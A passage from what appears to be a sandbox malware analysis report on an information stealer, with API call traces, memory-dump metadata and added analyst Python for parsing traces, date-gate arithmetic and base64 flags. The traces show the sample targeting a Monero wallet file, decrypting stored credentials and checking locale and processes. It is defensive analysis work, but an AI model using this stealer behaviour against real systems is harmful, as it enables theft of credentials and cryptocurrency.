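• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00321D40
• DeleteFileA.KERNEL32(00000000), ref: 00321DCA
• FindNextFileA.KERNEL32(000000FF,?), ref: 00321E20
• FindClose.KERNEL32(000000FF), ref: 00321E32
  • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
"""
RECORD_LOCALE = r"""
• GetKeyboardLayoutList.USER32(00000000,00000000,003405AF), ref: 00337BE1
• LocalAlloc.KERNEL32(00000040,?), ref: 00337BF9
• GetKeyboardLayoutList.USER32(?,00000000), ref: 00337C0D
• GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00337C62
• LocalFree.KERNEL32(00000000), ref: 00337D22
"""
RECORD_B64 = r"""
• CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N2,00000000,00000000), ref: 00329AEF
• LocalAlloc.KERNEL32(00000040,?,?,?,00324EEE,00000000,?), ref: 00329B01
• CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N2,00000000,00000000), ref: 00329B2A
• LocalFree.KERNEL32(?,?,?,?,00324EEE,00000000,?), ref: 00329B3F
"""

if __name__ == "__main__":
    for name, rec in (("walk", RECORD_WALK), ("locale", RECORD_LOCALE), ("b64", RECORD_B64)):
        calls = parse_api_lines(rec)
        print(name, classify(calls), literal_args(calls))
```

Subcall lines are excluded from classification on purpose: they belong to the string helpers at 0033A740/0033A8A0/0033A920/0033A9B0 that every walker shares, so they would tag each record identically. They are still the best source of targets, which is why literal_args keeps the \Monero\wallet.keys operand from the lstrlen subcall. Feed each record's APIs bullets in separately; the regex ignores the Strings, Memory Dump Source and Similarity lines, so pasting a whole record is harmless.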
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 7?$q1mh$su3s$w^$=7V$kz
                              • API String ID: 0-4251055165
                              • Opcode ID: 7a37fea4b47989297ab20c014e431b8561edd62e5b97bfdf6411fded3da50ea3
                              • Instruction ID: 1642656e8455cfdf7eb31fef762cc1600a1de7c9cb9699f26f9378be68c64802
                              • Opcode Fuzzy Hash: 7a37fea4b47989297ab20c014e431b8561edd62e5b97bfdf6411fded3da50ea3
                              • Instruction Fuzzy Hash: BAB2F5F3A0C200AFE3046E2DEC8567ABBE9EF94720F1A493DE6C5C7744E63558458693
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: L7G$BEDo$e5}$kwg{$qyT$P}}
                              • API String ID: 0-1244562776
                              • Opcode ID: 5552fec90f906e00a517a59d19cff2343a55740531b7d089a6637bd818fe069e
                              • Instruction ID: db2f5dd650630cf5e411eb4acfb9cc4cfe237534b16dfbc9345992acce370653
                              • Opcode Fuzzy Hash: 5552fec90f906e00a517a59d19cff2343a55740531b7d089a6637bd818fe069e
                              • Instruction Fuzzy Hash: B4B2F1F360C2049FE704AE29EC8567AFBE5EF94320F16892DE6C4C3744EA7598458787
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N2,00000000,00000000), ref: 00329AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,00324EEE,00000000,?), ref: 00329B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N2,00000000,00000000), ref: 00329B2A
                              • LocalFree.KERNEL32(?,?,?,?,00324EEE,00000000,?), ref: 00329B3F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID: N2
                              • API String ID: 4291131564-1109174167
                              • Opcode ID: 1313c018c2faf84b2c4518090b51466dede7921d3e306a0423826208429486e5
                              • Instruction ID: 1dd05587ee5fb1cf77def7a9688ab6d426282c1dbcd8fef53d009a7274c5eff8
                              • Opcode Fuzzy Hash: 1313c018c2faf84b2c4518090b51466dede7921d3e306a0423826208429486e5
                              • Instruction Fuzzy Hash: B511A2B4240208EFEB10CFA4DC95FAA77B5FB89700F208059F9159B390C7B6A901DB90
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: A~$E]]~$e,Y$kNWo$mCmi
                              • API String ID: 0-275301365
                              • Opcode ID: 78f9311134010d27747dc2a62b1bcf567df916eaf49fb0971fb875d818219cca
                              • Instruction ID: a862eacb6059cc4af6cb27a0f6245b3f6839797513cebb2a74790d50276b5f7d
                              • Opcode Fuzzy Hash: 78f9311134010d27747dc2a62b1bcf567df916eaf49fb0971fb875d818219cca
                              • Instruction Fuzzy Hash: D1A204F36086049FE704AE2DEC8567AFBE5EF94720F1A493DEAC4C3344E63598158687
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0032C871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0032C87C
                              • lstrcat.KERNEL32(?,00340B46), ref: 0032C943
                              • lstrcat.KERNEL32(?,00340B47), ref: 0032C957
                              • lstrcat.KERNEL32(?,00340B4E), ref: 0032C978
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: 98d8a18ecc64ea955157865bb871cf9fd4a373eab4d993a8bfcdd1908e431e4b
                              • Instruction ID: 842a6e5adb78ea92c707e804efc93979c877127f9ce8c23ce833a91bd249867f
                              • Opcode Fuzzy Hash: 98d8a18ecc64ea955157865bb871cf9fd4a373eab4d993a8bfcdd1908e431e4b
                              • Instruction Fuzzy Hash: 2F4182B5D1421ADFDB10CFA4DD89BEEB7B8BB44304F1041A8E509B7280D7B0AA84DF91
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 0033696C
                              • sscanf.NTDLL ref: 00336999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 003369B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 003369C0
                              • ExitProcess.KERNEL32 ref: 003369DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: 4b72403d9358686883f554f9b6db281245c5c9953de9ea467ff95c23338f96d9
                              • Instruction ID: 761cf08dee9438199729f1316dd890bae776898e358a6ddf7aa12a8e17863e3a
                              • Opcode Fuzzy Hash: 4b72403d9358686883f554f9b6db281245c5c9953de9ea467ff95c23338f96d9
                              • Instruction Fuzzy Hash: 1321EA75D10208AFCF04EFE8D985AEEB7B5BF48300F04852AE406B3250EB745609DBA5
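                               The call sequence in this function (GetSystemTime, sscanf, SystemTimeToFileTime twice, ExitProcess) has the shape of a date gate: a hard-coded date string is parsed with sscanf, both it and the current system time are converted to FILETIME, and the process exits on one side of the comparison. That reading is an inference from the API chain, not something the report states. The Python below is an added example (not code from the sample, from Stealc, or from Joe Sandbox) that reproduces the FILETIME arithmetic so an analyst can work out what an embedded date means and which VM clock setting would not trip such a gate. The "DD.MM.YYYY" layout of the date string and the direction of the comparison are assumptions.

```python
from datetime import datetime, timedelta, timezone
import re

# A Windows FILETIME counts 100-nanosecond intervals since 1601-01-01 00:00 UTC.
_FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
_TICKS_PER_SECOND = 10_000_000


def utc_date(year: int, month: int, day: int) -> datetime:
    """Build a timezone-aware UTC datetime (what GetSystemTime reports, at midnight)."""
    return datetime(year, month, day, tzinfo=timezone.utc)


def systemtime_to_filetime(dt: datetime) -> int:
    """Equivalent of SystemTimeToFileTime for a timezone-aware datetime."""
    if dt.tzinfo is None:
        dt = dt.replace(tzinfo=timezone.utc)
    delta = dt - _FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * _TICKS_PER_SECOND + delta.microseconds * 10


def filetime_to_datetime(ft: int) -> datetime:
    """Inverse conversion, for reading FILETIME values out of a debugger or a dump."""
    seconds, ticks = divmod(ft, _TICKS_PER_SECOND)
    return _FILETIME_EPOCH + timedelta(seconds=seconds, microseconds=ticks // 10)


def parse_embedded_date(text: str) -> datetime:
    """Stand-in for sscanf(text, "%d.%d.%d", &day, &month, &year).

    The "DD.MM.YYYY" layout is an assumption; the report does not show the format string.
    """
    m = re.fullmatch(r"(\d{1,2})\.(\d{1,2})\.(\d{4})", text.strip())
    if m is None:
        raise ValueError(f"unparseable date string: {text!r}")
    day, month, year = (int(g) for g in m.groups())
    return utc_date(year, month, day)


def gate_would_exit(embedded: str, now: datetime) -> bool:
    """True when a gate of this shape would reach ExitProcess.

    Assumes the common direction: the sample stops running once the clock is past
    the embedded date. The opposite direction (refuse to run before a date) is the
    same comparison with the operands swapped.
    """
    return systemtime_to_filetime(now) > systemtime_to_filetime(parse_embedded_date(embedded))


def clock_that_passes(embedded: str) -> datetime:
    """A VM clock setting (one day before the embedded date) under which the gate is not tripped."""
    return parse_embedded_date(embedded) - timedelta(days=1)
```

                               Both SystemTimeToFileTime results are 64-bit integers, so the comparison in the binary is an unsigned 64-bit compare; the functions above return Python ints, which compare the same way. If a sample of this kind exits immediately in the sandbox, checking the analysis VM clock against the string fed to sscanf is the first thing to try.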
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0032724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00327254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00327281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 003272A4
                              • LocalFree.KERNEL32(?), ref: 003272AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: 4b0f749bdceb93d93037002f526dd120d0c8bcde359aa7b956ee1233627005fe
                              • Instruction ID: d44ac4df97f65aee4a14caf3c31647f3b7a4d9ed389f60302cdec2e36f322831
                              • Opcode Fuzzy Hash: 4b0f749bdceb93d93037002f526dd120d0c8bcde359aa7b956ee1233627005fe
                              • Instruction Fuzzy Hash: 72010CB5A40208BBEB14DFD8DD4AF9E77B8EB44B04F104558FB05BB2C0D6B0AA049B65
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0033961E
                              • Process32First.KERNEL32(00340ACA,00000128), ref: 00339632
                              • Process32Next.KERNEL32(00340ACA,00000128), ref: 00339647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 0033965C
                              • CloseHandle.KERNEL32(00340ACA), ref: 0033967A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: c27fb3dbd7f7736729af00e848c03560a759f7388f3615e52630a8301567ee1d
                              • Instruction ID: 8556ba097904d07849ed6cb2f348c2a996b2d2abdf51a17f5967b1fa639024ca
                              • Opcode Fuzzy Hash: c27fb3dbd7f7736729af00e848c03560a759f7388f3615e52630a8301567ee1d
                              • Instruction Fuzzy Hash: 6F011E75A01208EBCB15DFA9CD89BEDB7F8EB58310F104189E909A7250DBB4AB44DF51
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: (9m[$G5M_$jO$jO
                              • API String ID: 0-1708999616
                              • Opcode ID: 78b24827a67af97f58d95914e59e3382eaf04f5421aeb389e60a4f5f9549ca7b
                              • Instruction ID: e8de0409c9d04a7dc15fe009525d0c85869766837500f9cd161ea0ad4f154c0b
                              • Opcode Fuzzy Hash: 78b24827a67af97f58d95914e59e3382eaf04f5421aeb389e60a4f5f9549ca7b
                              • Instruction Fuzzy Hash: FCB2F4F3A0C3149FE304AE2DEC8566AFBE5EF94320F16493DEAC487744EA3558448697
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,00325184,40000001,00000000,00000000,?,00325184), ref: 00338EC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: 1114aea0993611446f386945d03ea0d1d115b83e28851bb2ffda7b7713833c23
                              • Instruction ID: 8266e4b3ba2046bd052c1264e421985673b4c2a4f9565fcfa883b50e5d3d56a9
                              • Opcode Fuzzy Hash: 1114aea0993611446f386945d03ea0d1d115b83e28851bb2ffda7b7713833c23
                              • Instruction Fuzzy Hash: 5D11E574200309BFDB01CFA8E885FAB37A9AF89714F109558F9198B250DB75ED45EB60
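                               Three of the functions listed above wrap the CRYPT32 base64 routines: the function at 00329AEF calls CryptStringToBinaryA with dwFlags 00000001 (CRYPT_STRING_BASE64) twice, with a LocalAlloc in between, which is the size-query-then-decode idiom; the function at 0032C871 decodes once and then builds a string with lstrcat; and the function at 00338EC0 encodes with CryptBinaryToStringA and dwFlags 40000001 (CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF). The flag difference matters when writing a decoder for data this sample produces or consumes: without CRYPT_STRING_NOCRLF, CryptBinaryToStringA inserts "\r\n" after every 64 output characters and at the end, so output made with 40000001 is plain one-line base64 while 00000001 output is line-wrapped. The Python below is an added example (not code from the sample, from Stealc, or from Joe Sandbox) that emulates both flag combinations offline, including the whitespace skipping of CryptStringToBinaryA, and names the flag bits; only the two flags seen in this report are modelled.

```python
import base64

# dwFlags values from wincrypt.h; only the two that appear in this sample's calls are modelled.
CRYPT_STRING_BASE64 = 0x00000001   # format selector, carried in the low byte
CRYPT_STRING_NOCRLF = 0x40000000   # modifier: no line breaks in the output
_FLAG_NAMES = {
    CRYPT_STRING_BASE64: "CRYPT_STRING_BASE64",
    CRYPT_STRING_NOCRLF: "CRYPT_STRING_NOCRLF",
}
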